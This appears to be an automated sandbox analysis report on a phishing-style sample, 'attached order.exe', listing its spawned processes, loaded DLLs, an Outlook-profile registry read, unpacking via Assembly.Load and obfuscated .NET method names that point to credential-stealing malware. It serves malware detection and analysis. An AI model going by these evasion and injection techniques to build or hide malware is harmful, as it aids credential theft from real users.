                      Source: unknownProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                      Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: attached order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: attached order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: cacls.pdbGCTL source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cacls.pdb source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: attached order.exe, attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.attached order.exe.4bf5828.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.attached order.exe.9e20000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.attached order.exe.4c15848.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A34822 pushfd ; iretd 0_2_05A34829
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A33FE2 push esp; retf 0_2_05A33FE9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0042E1F3 push edi; ret 3_2_0042E1FC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00419391 push cs; retf 3_2_00419392
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00416434 push FFFFFFECh; iretd 3_2_0041644D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040AD51 push ebx; retf 3_2_0040AD54
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00411D86 push ds; retf 3_2_00411D9F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040ADAF push ebx; retf 3_2_0040AD54
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004035B0 push eax; ret 3_2_004035B2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00404E90 push eax; ret 3_2_00404EA9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017021AD pushad ; retf 0004h3_2_0170223F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017308CD push ecx; mov dword ptr [esp], ecx3_2_017308D6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017097A1 push es; iretd 3_2_017097A8
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360874D push cs; ret 4_2_03608764
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360B3C7 push edx; ret 4_2_0360B3D3
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036087D5 push cs; ret 4_2_03608764
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360E3B2 push esi; ret 4_2_0360E3B3
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036003B7 push ebx; retf 4_2_036003BC
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036017B7 pushad ; iretd 4_2_036017B8
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360B27F push esi; iretd 4_2_0360B295
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_03611102 push eax; ret 4_2_03611104
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360BC1F pushad ; retf 4_2_0360BC21
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360B08C pushad ; ret 4_2_0360B0FC
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EE08CD push ecx; mov dword ptr [esp], ecx5_2_02EE08D6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066E7D3 push ds; retf 5_2_0066E7EC
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_00678844 push FFFFFF8Ah; ret 5_2_00678859
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0068AC40 push edi; ret 5_2_0068AC49
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006677FC push ebx; retf 5_2_006677A1
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066779E push ebx; retf 5_2_006677A1
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006618DD push eax; ret 5_2_006618F6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0067DD41 push ds; iretd 5_2_0067DD5C
                      Source: attached order.exeStatic PE information: section name: .text entropy: 7.504742855579335
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, l79wYB7WMJ2cyYK3S5.csHigh entropy of concatenated method names: 'pvgoXenhU6', 'EqRo3wvQOS', 'GEwoTeN2m0', 'jDXob6ffWQ', 'Y4roifhMh8', 'zliov7a7DQ', 'AuWoqxpGNA', 'pcuoamH1jE', 'WHioQLb4Vx', 'em7oL3S8oh'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, nq4p8DrrfiFhR2PyIVo.csHigh entropy of concatenated method names: 'lmmfrHJB4q', 'xA1fze807A', 'zP5hKJJ8Hq', 'hOOhMQBVrF', 'UaKhYVAXsG', 't4Rht4bNg9', 'R74h0Ulalw', 'hnyh8cBmq7', 'HgmhsfVRNx', 'DhEhIohEMY'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, kiIMTrfFNeVMhL8TTa.csHigh entropy of concatenated method names: 'FPtciGKgY4', 'uwjcqjj1y7', 'BaTA28LlKI', 'SpLAd96T7O', 'MBQAHk2Z1P', 'YatAPovX6C', 'bbtApxfJ6d', 'eKsAjrM3fq', 'FlmAWUOTau', 'CVHAJj3tUq'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Yr9UhjPRPHk49KsZse.csHigh entropy of concatenated method names: 'WmNIkEJEn2', 'rIPIGNn2vC', 'gNdIC1OxfP', 'ISbImWnp4F', 'NTUIxlHtIy', 'UToIuqjmwI', 'IyGIneOPmS', 'CIIIUTcxLh', 'LLVIOv2qOb', 'aWyIrpQTNW'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, kLptsSr60HPKa7R7vbZ.csHigh entropy of concatenated method names: 'ToString', 'QSBhaY6R1N', 'QfFhQfRKDo', 'duPhLR7Q1O', 'MuWhBqrjib', 'xumh6Z4ZCF', 'cJuh2dQCcY', 'm8fhd62BeY', 'ptMkRoL6UDDMUYeAth5', 'LdDnDvLruvYPQAdqcLt'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, GnTBRbs4alXFnisyMh.csHigh entropy of concatenated method names: 'b98fAZsDLZ', 'Fb7fcrjjrB', 'hBNfwoJRlH', 'q0pfoqEqiV', 'CuifF7UwQB', 'W3Qf5DL71J', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, itYFVZIe9hkpVHMofY.csHigh entropy of concatenated method names: 'Seqw8KTyg9', 'wGJwIye311', 'ETswceKNwF', 'rdtwo0d3Mt', 'rPNw5unmDi', 'Xj6cxE2IPA', 'REYcuRiqgA', 'C6DcnFpO6e', 'H35cUZTehd', 'iZccOkPpke'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, eRABhcrNQh1PLErMOYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8DyFu4HrR', 'YJGyflb2Vj', 'g58yhLRGwC', 'XCIyyEgJrc', 'nViySFbZ2e', 'dgCy9Z1mSt', 'hS4yeae9CO'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, cQmN4b32gbIKZ4x1dS.csHigh entropy of concatenated method names: 'DJHAbcyoR3', 'qRYAvhfbWe', 'wtIAaSorC8', 'AWUAQTwRIH', 'Fq7A1BNvno', 'r18ADf5rMo', 'NiXAl1qLuX', 'iQcAEwOW1T', 'Ho6AFo0NEW', 'bUXAfSBKsr'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, gfskp8Q84So3K9tiKr.csHigh entropy of concatenated method names: 'oqmoswUdaK', 'QQSoAAp7nb', 'UkFowfpaYN', 'DL2wrPbg8b', 'm4Bwzjr8rP', 'dPvoKf3vwN', 'iSjoMp8hbt', 'ji0oYRb74t', 'RslotkMfJk', 'NKMo0Iqhy3'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, s8HNx2AxO9TnfXUWQd.csHigh entropy of concatenated method names: 'Bc3wLwrUa4xrOqpUmEP', 'c3mOOMrhIJYLCoOtbx2', 'lLtpvir2H37k5SJmhXL', 'SGcwEkCHm9', 'QcHwFyAUpx', 'Tnrwf4dT1X', 'QllN7Tr0buwPgGdlIWP', 'BUhh12rIxlZnyXgHgu8'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, YmlVkdiyjWDJPWx8hw.csHigh entropy of concatenated method names: 'Kc5F1d6u2P', 'gfhFlXZYTw', 'bKmFFuT2Mi', 'mB7FhQJYSf', 'uVaFSEKtWm', 'mGrFegvV9T', 'Dispose', 'qkhEsNgaN7', 'ctBEIptCKQ', 'n2kEAYIIdj'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, eTLVDTKsInEqj6ZJVp.csHigh entropy of concatenated method names: 'QgDlgjp2yu', 'HJ2l4n9COW', 'ToString', 'ErplsveGcJ', 'hS1lIN7DEg', 'rhulAYiITn', 'nJClc4KFxZ', 'FdIlwnlkcf', 'oURlobXjfr', 'ajnl5AlO1T'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, n33M3uz3ORD1UdBYlt.csHigh entropy of concatenated method names: 'yhXfvgH9Ws', 'NiefaHeHlH', 'ggHfQ9EU1s', 'ewcfBqZ045', 'pOof60l7ES', 'xJQfdnZR1D', 'hXxfHaBvhZ', 'n02fe3hIU8', 'n3hfXZhrfp', 'intf3Wmljq'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, EgP0XVNcRfQGNejquO.csHigh entropy of concatenated method names: 'aMLMoyQ3Ek', 'LyMM5lVUe8', 'boaMgVua79', 'fotM47u3Ye', 'z3cM1f0Zcy', 'qT3MDucRFr', 'ARTbvkMc6KNFI5I7C4', 'K1D1tUKcpeii4Q7rx4', 'BscMMcKMgP', 'DIdMtlxfsY'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, WcniDe88ARxPuNbytN.csHigh entropy of concatenated method names: 'ToString', 'mH4DVBYc97', 'J67D6XaQra', 'aweD2W48ye', 'zFrDd23Bud', 'RFcDHlML0s', 'IYcDPbicSt', 'aoLDpoTdw7', 'FxXDjjQtsc', 'FoSDW1Qnr6'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Rpq2Lh6LQL1dHucNxX.csHigh entropy of concatenated method names: 'm7TTiK7tM', 'VHibv4SUk', 'HE5vp148q', 'YVVqfcUKn', 'IYRQ4VAXm', 'LaQL1bfvw', 'p3u9o4ogGhsFFWSnpA', 'CBcLcrX1At8i9Ajp8V', 'FLDEJhytJ', 'pMDfhOsim'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, QdlGFmrkGBZ5RgQMJfR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yD1fVnCA6l', 'DP0fNkEoC5', 'w7DfRBGDaS', 'JDtfkYnGmU', 'UuhfGW7Tyi', 'Nq1fC7nsM7', 'JXifm2WJph'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csHigh entropy of concatenated method names: 'TiPt8tBHwg', 'E53tsFWnDp', 'YTTtIo7c1r', 'EdntAPQxvJ', 'qybtcOwFm3', 'ALVtwjAT2r', 'JOItoUSNNU', 'AMVt544uEg', 'ed3tZZH0HO', 'tjVtgUqYix'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, TPN3d7UDbhgCkcLQUk.csHigh entropy of concatenated method names: 'bmJFBD6kfb', 'ms0F6I4Z78', 'SdJF2tcAe1', 'o9TFd4VS17', 'h7RFHLSb8E', 'pYvFPButgh', 'MB5Fp9V5Hc', 'm4qFj6aDgQ', 'dobFWE09k7', 'wRWFJvXUFj'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, iJdG0BmQPFSP0j3YBo.csHigh entropy of concatenated method names: 'Dispose', 'PuWMO0iSne', 'BkyY61qHms', 'qVqyxfFIiq', 'gM6Mr6rK2j', 'MP6MzIJR6E', 'ProcessDialogKey', 'jeeYKZ3MjL', 'RNSYMwJJsO', 'AITYYbiEuL'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, rYI1hawWmEIHpHHthE.csHigh entropy of concatenated method names: 'SXM7aBMCrs', 'Qew7Qlq9BQ', 'qYp7B9oeot', 'aW576nWYDA', 'KcR7dPoSI3', 'Asq7HFnwKj', 'PGS7pmRMIB', 'VZG7jdwxrx', 'WQw7JtQcOB', 'CLi7VPLoYV'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, eVvt4kqypRIiTj4YV6.csHigh entropy of concatenated method names: 'wZTweCm5HJ', 'E4xwX5U1LS', 'I7RwTB2KQX', 'lN6wbGfoD5', 'corwvancqC', 'gAbwqPCUyv', 'Ja4wQOdPRZ', 'G52wLOsX9n', 'MO84JSrPj01cKQwhiYE', 'GPBaVXrlA0Ft4dXne6d'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, l79wYB7WMJ2cyYK3S5.csHigh entropy of concatenated method names: 'pvgoXenhU6', 'EqRo3wvQOS', 'GEwoTeN2m0', 'jDXob6ffWQ', 'Y4roifhMh8', 'zliov7a7DQ', 'AuWoqxpGNA', 'pcuoamH1jE', 'WHioQLb4Vx', 'em7oL3S8oh'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, nq4p8DrrfiFhR2PyIVo.csHigh entropy of concatenated method names: 'lmmfrHJB4q', 'xA1fze807A', 'zP5hKJJ8Hq', 'hOOhMQBVrF', 'UaKhYVAXsG', 't4Rht4bNg9', 'R74h0Ulalw', 'hnyh8cBmq7', 'HgmhsfVRNx', 'DhEhIohEMY'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, kiIMTrfFNeVMhL8TTa.csHigh entropy of concatenated method names: 'FPtciGKgY4', 'uwjcqjj1y7', 'BaTA28LlKI', 'SpLAd96T7O', 'MBQAHk2Z1P', 'YatAPovX6C', 'bbtApxfJ6d', 'eKsAjrM3fq', 'FlmAWUOTau', 'CVHAJj3tUq'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Yr9UhjPRPHk49KsZse.csHigh entropy of concatenated method names: 'WmNIkEJEn2', 'rIPIGNn2vC', 'gNdIC1OxfP', 'ISbImWnp4F', 'NTUIxlHtIy', 'UToIuqjmwI', 'IyGIneOPmS', 'CIIIUTcxLh', 'LLVIOv2qOb', 'aWyIrpQTNW'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, kLptsSr60HPKa7R7vbZ.csHigh entropy of concatenated method names: 'ToString', 'QSBhaY6R1N', 'QfFhQfRKDo', 'duPhLR7Q1O', 'MuWhBqrjib', 'xumh6Z4ZCF', 'cJuh2dQCcY', 'm8fhd62BeY', 'ptMkRoL6UDDMUYeAth5', 'LdDnDvLruvYPQAdqcLt'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, GnTBRbs4alXFnisyMh.csHigh entropy of concatenated method names: 'b98fAZsDLZ', 'Fb7fcrjjrB', 'hBNfwoJRlH', 'q0pfoqEqiV', 'CuifF7UwQB', 'W3Qf5DL71J', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, itYFVZIe9hkpVHMofY.csHigh entropy of concatenated method names: 'Seqw8KTyg9', 'wGJwIye311', 'ETswceKNwF', 'rdtwo0d3Mt', 'rPNw5unmDi', 'Xj6cxE2IPA', 'REYcuRiqgA', 'C6DcnFpO6e', 'H35cUZTehd', 'iZccOkPpke'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eRABhcrNQh1PLErMOYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8DyFu4HrR', 'YJGyflb2Vj', 'g58yhLRGwC', 'XCIyyEgJrc', 'nViySFbZ2e', 'dgCy9Z1mSt', 'hS4yeae9CO'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, cQmN4b32gbIKZ4x1dS.csHigh entropy of concatenated method names: 'DJHAbcyoR3', 'qRYAvhfbWe', 'wtIAaSorC8', 'AWUAQTwRIH', 'Fq7A1BNvno', 'r18ADf5rMo', 'NiXAl1qLuX', 'iQcAEwOW1T', 'Ho6AFo0NEW', 'bUXAfSBKsr'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, gfskp8Q84So3K9tiKr.csHigh entropy of concatenated method names: 'oqmoswUdaK', 'QQSoAAp7nb', 'UkFowfpaYN', 'DL2wrPbg8b', 'm4Bwzjr8rP', 'dPvoKf3vwN', 'iSjoMp8hbt', 'ji0oYRb74t', 'RslotkMfJk', 'NKMo0Iqhy3'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, s8HNx2AxO9TnfXUWQd.csHigh entropy of concatenated method names: 'Bc3wLwrUa4xrOqpUmEP', 'c3mOOMrhIJYLCoOtbx2', 'lLtpvir2H37k5SJmhXL', 'SGcwEkCHm9', 'QcHwFyAUpx', 'Tnrwf4dT1X', 'QllN7Tr0buwPgGdlIWP', 'BUhh12rIxlZnyXgHgu8'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, YmlVkdiyjWDJPWx8hw.csHigh entropy of concatenated method names: 'Kc5F1d6u2P', 'gfhFlXZYTw', 'bKmFFuT2Mi', 'mB7FhQJYSf', 'uVaFSEKtWm', 'mGrFegvV9T', 'Dispose', 'qkhEsNgaN7', 'ctBEIptCKQ', 'n2kEAYIIdj'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eTLVDTKsInEqj6ZJVp.csHigh entropy of concatenated method names: 'QgDlgjp2yu', 'HJ2l4n9COW', 'ToString', 'ErplsveGcJ', 'hS1lIN7DEg', 'rhulAYiITn', 'nJClc4KFxZ', 'FdIlwnlkcf', 'oURlobXjfr', 'ajnl5AlO1T'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, n33M3uz3ORD1UdBYlt.csHigh entropy of concatenated method names: 'yhXfvgH9Ws', 'NiefaHeHlH', 'ggHfQ9EU1s', 'ewcfBqZ045', 'pOof60l7ES', 'xJQfdnZR1D', 'hXxfHaBvhZ', 'n02fe3hIU8', 'n3hfXZhrfp', 'intf3Wmljq'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, EgP0XVNcRfQGNejquO.csHigh entropy of concatenated method names: 'aMLMoyQ3Ek', 'LyMM5lVUe8', 'boaMgVua79', 'fotM47u3Ye', 'z3cM1f0Zcy', 'qT3MDucRFr', 'ARTbvkMc6KNFI5I7C4', 'K1D1tUKcpeii4Q7rx4', 'BscMMcKMgP', 'DIdMtlxfsY'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, WcniDe88ARxPuNbytN.csHigh entropy of concatenated method names: 'ToString', 'mH4DVBYc97', 'J67D6XaQra', 'aweD2W48ye', 'zFrDd23Bud', 'RFcDHlML0s', 'IYcDPbicSt', 'aoLDpoTdw7', 'FxXDjjQtsc', 'FoSDW1Qnr6'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Rpq2Lh6LQL1dHucNxX.csHigh entropy of concatenated method names: 'm7TTiK7tM', 'VHibv4SUk', 'HE5vp148q', 'YVVqfcUKn', 'IYRQ4VAXm', 'LaQL1bfvw', 'p3u9o4ogGhsFFWSnpA', 'CBcLcrX1At8i9Ajp8V', 'FLDEJhytJ', 'pMDfhOsim'
